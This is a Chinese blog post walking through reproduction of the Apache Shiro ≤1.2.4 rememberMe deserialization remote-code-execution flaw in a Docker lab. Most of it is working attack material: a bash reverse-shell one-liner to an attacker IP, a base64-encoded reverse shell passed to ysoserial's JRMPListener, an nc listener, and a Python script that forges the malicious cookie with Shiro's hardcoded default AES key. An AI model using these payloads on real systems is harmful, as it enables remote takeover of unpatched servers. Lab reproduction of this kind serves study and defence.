shiro反序列化的复现

作者: 喵了个咪0 | 来源:发表于2019-11-12 22:59 被阅读0次

shiro 反序列化漏洞解决方案总结
shiro反序列化的复现
shiro反序列化学习
fastjson反序列化复现
Apache Shiro1.2.4漏洞分析
Apache Shiro反序列化远程代码执行复现
2021-02-03 Shiro序列化漏洞复现
Shiro反序列化漏洞利用
自研 JavaRasp 检测到 Apache Shiro 反序列
Apache Shiro 反序列化

搭建环境：云服务器 ubuntu18.0.4

漏洞的原理：shiro默认使用了CookieRememberMeManager，其处理cookie的流程是：得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化。然而AES的密钥是硬编码的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

漏洞影响的版本：Apache Shiro <= 1.2.4

payload:前16字节的密钥-->后面加入序列化参数-->Aes-128-cbc加密-->base64编码-->发送cookie

附件过程中，踩了一个大坑，坑就是我的云服务器的java不能用于复现(不晓得是什么原因)，所以需要我们卸载服务器的java环境，重新安装一个

一：彻底卸载服务器java

(1) apt-get update

(2) apt-cache search java | awk '{print($1)}' | grep -E -e

'^(ia32-)?(sun|oracle)-java' -e '^openjdk-' -e '^icedtea' -e

'^(default|gcj)-j(re|dk)' -e '^gcj-(.*)-j(re|dk)' -e 'java-common' |

xargs sudo apt-get -y remove

(3) apt-get -y autoremove

2、清除配置信息: dpkg -l | grep ^rc | awk '{print($2)}' | xargs sudo apt-get -y purge

3、清除java配置及缓存: bash -c 'ls -d /home/*/.java' | xargs sudo rm -rf

4、手动清除JVMs: rm -rf /usr/lib/jvm/*

二：安装java

更新软件包列表：sudo apt-get update

安装openjdk-8-jdk：sudo apt-get install openjdk-8-jdk

三：搭建复现的环境：

拉取镜像：docker pull medicean/vulapps:s_shiro_1

启动镜像：docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1

访问搭建的shiro:ip:8081

制作反弹shell 代码:

使用http://www.jackson-t.ca/runtime-exec-payloads.html 进行编码

bash -I >& /dev/tcp 192.168.19.147/1234 0>&1

使用ysoserial中JRMP监听模块，监听6666端口:;

攻击机中执行命令：

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjE0Ni8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

采用nc监听1234端口：

nc -lnvp 1234

Shiro_JRMPClient.py:

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def encode_rememberme(command):

popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)

BS = AES.block_size

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

#key = base64.b64decode("Z3VucwAAAAAAAAAAAAAAAA==")

iv = uuid.uuid4().bytes

encryptor = AES.new(key, AES.MODE_CBC, iv)

file_body = pad(popen.stdout.read())

base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))

return base64_ciphertext

if __name__ == '__main__':

payload = encode_rememberme(sys.argv[1])

print "rememberMe={0}".format(payload.decode())